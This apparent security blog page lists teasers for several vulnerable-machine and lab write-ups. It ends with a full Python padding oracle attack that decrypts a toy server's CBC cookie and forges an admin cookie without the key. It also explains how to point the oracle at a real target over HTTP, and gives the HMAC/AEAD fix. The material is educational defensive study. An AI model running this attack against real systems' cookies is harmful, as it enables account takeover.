SickOs: 1.1 is a vulnerable machine; the objective is to get root and read the file /root/a0216ea4d51874464078c618298b1367.txt
Continuing the analysis of the application from the previous post, I found that the sessionId is held in a local file.
I chose one application in Google Play to test. Its main functionality was focused on consuming a RESTful web service. I decompiled this application using the tools dex2jar and JD-GUI. Firstly, I connected my phone to the computer to get the apk file.
DVWS is similar to Damn Vulnerable Web Application, but communication between client and server is based on WebSockets. Source code is available here, but it's much easier to use the prepared Docker image.
In this exercise we have a credit card checking web application to exploit. It takes a credit card number and returns information on whether our card is compromised or not.
According to the VM's description, we have to get root and read the /root/Proof.txt file.
Our goal is to gain access to the admin account by a padding oracle attack. The application allows us to register accounts; an encrypted cookie is then used to authenticate.
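The attack named in the last post above, as an added, self-contained example that is not code from the original post or from the target application. It models a hypothetical server (VulnerableServer) whose authentication cookie is IV || CBC-ciphertext of "user=<name>" with PKCS#7 padding, and whose response leaks whether the padding was valid (the oracle). The block cipher is a constructed Feistel toy standing in for AES; the attack never touches it, only the oracle. It recovers the plaintext of a registered user's cookie byte by byte and then forges a valid "user=admin" cookie without the key, which is exactly what the exercise's goal requires.

```python
import hashlib
import hmac
import os

BLOCK = 16


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# Toy block cipher, constructed for this example as a stand-in for AES: a 4-round
# Feistel network with an HMAC-SHA256 round function (deterministic, invertible).
def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r


def pad(data: bytes) -> bytes:  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if len(data) % BLOCK or not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # cookie layout assumed here: IV || ciphertext


def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    out, prev = b"", data[:BLOCK]
    for i in range(BLOCK, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    return out


class VulnerableServer:
    """Hypothetical app: padding_oracle() is the observable difference (e.g. an
    HTTP 500 on a padding error) that the attacker has on the real target."""

    def __init__(self) -> None:
        self.key = os.urandom(16)

    def issue_cookie(self, username: bytes) -> bytes:
        return cbc_encrypt(self.key, os.urandom(BLOCK), pad(b"user=" + username))

    def padding_oracle(self, cookie: bytes) -> bool:
        try:
            unpad(cbc_decrypt(self.key, cookie))
            return True
        except ValueError:
            return False


def recover_intermediate(oracle, target: bytes) -> bytes:
    """Recover D_k(target) right to left: forge the preceding block so that the
    decrypted block ends in valid padding 01, then 02 02, then 03 03 03, ..."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad_val  # already-known bytes set to pad_val
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # A hit on the last byte may be an accidental 02 02 (or longer)
                # padding; disturbing the byte before it rules that case out.
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("oracle accepted nothing; not a padding oracle?")
    return bytes(inter)


def padding_oracle_decrypt(oracle, cookie: bytes) -> bytes:
    blocks = [cookie[i:i + BLOCK] for i in range(0, len(cookie), BLOCK)]
    plain = b"".join(_xor(recover_intermediate(oracle, cur), prev)
                     for prev, cur in zip(blocks, blocks[1:]))
    return unpad(plain)


def padding_oracle_encrypt(oracle, plaintext: bytes) -> bytes:
    """Forge a cookie for chosen plaintext: pick the last ciphertext block freely,
    then work backwards, each preceding block (finally the IV) = D_k(next) ^ P."""
    padded = pad(plaintext)
    blocks = [bytes(BLOCK)]
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        blocks.insert(0, _xor(recover_intermediate(oracle, blocks[0]), padded[i:i + BLOCK]))
    return b"".join(blocks)
```

Against a real target the oracle function wraps an HTTP request with the forged cookie and returns whether the response differs (status code, error page, timing) from the padding-error case; everything else stays the same. The cost is at most 256 oracle queries per byte plus the occasional extra probe on the last byte. The fix on the server side is to authenticate the cookie (an HMAC over IV and ciphertext, verified before decryption, or an AEAD mode) so that tampered ciphertexts are rejected before padding is ever examined.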